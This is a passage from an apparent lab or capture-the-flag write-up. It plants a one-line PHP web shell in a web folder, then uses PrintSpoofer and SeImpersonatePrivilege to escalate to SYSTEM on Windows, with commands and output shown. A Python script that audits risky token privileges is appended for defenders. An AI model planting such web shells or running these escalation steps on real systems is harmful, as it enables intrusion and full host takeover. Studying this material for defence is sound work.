There is also another user called apache. We also have write access to the htdocs folder, which means that we can attempt to get code execution as the apache user.
I created a PHP file and added it to the htdocs folder where the other PHP files were.
<pre>
<?php
system($_GET['cmd']);
?>
</pre>
After getting another shell as the apache user, I enumerated the privileges of the user apache.
<pre>
C:\Users\apache>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeTcbPrivilege                Act as part of the operating system       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
</pre>
I used PrintSpoofer to get Administrator.
<pre>
C:\Users\apache>PrintSpoofer.exe -i -c cmd.exe
PrintSpoofer.exe -i -c cmd.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.2029]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
</pre>
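From the defender's side, the `whoami /priv` listing above is what an audit of a web server's service account should flag. The following is an added example, not part of the original write-up: it parses that output and reports the token-related privileges the account holds. The privilege selection, the function names and the sample text are assumptions of the example.

```python
import re

# Privileges that let a process obtain or use another account's token.
# This selection is an assumption of the example, not taken from the write-up.
TOKEN_PRIVS = {
    "SeImpersonatePrivilege": "can impersonate any client that authenticates to it",
    "SeAssignPrimaryTokenPrivilege": "can start a process under another token",
    "SeTcbPrivilege": "can act as part of the operating system",
    "SeDebugPrivilege": "can open and modify any process",
}

# One table row: privilege name, description, state. \s+ accepts both the
# aligned console layout and output whose padding was collapsed in transit.
ROW = re.compile(r"^\s*(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")

# Constructed sample, modelled on the listing above (third row collapsed).
SAMPLE = """\
C:\\Users\\apache>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeTcbPrivilege                Act as part of the operating system       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""


def parse_privileges(text):
    """Return {privilege name: state} for every table row found in text."""
    rows = (ROW.match(line) for line in text.splitlines())
    return {m.group(1): m.group(3) for m in rows if m}


def audit(text):
    """List (name, state, reason) for each token-related privilege held.

    A Disabled privilege is still present in the token and the process can
    enable it itself, so it is reported as well, not only Enabled ones.
    """
    held = parse_privileges(text)
    return [(n, held[n], why) for n, why in TOKEN_PRIVS.items() if n in held]


if __name__ == "__main__":
    for name, state, why in audit(SAMPLE):
        print(f"[!] {name} ({state}): account {why}")
```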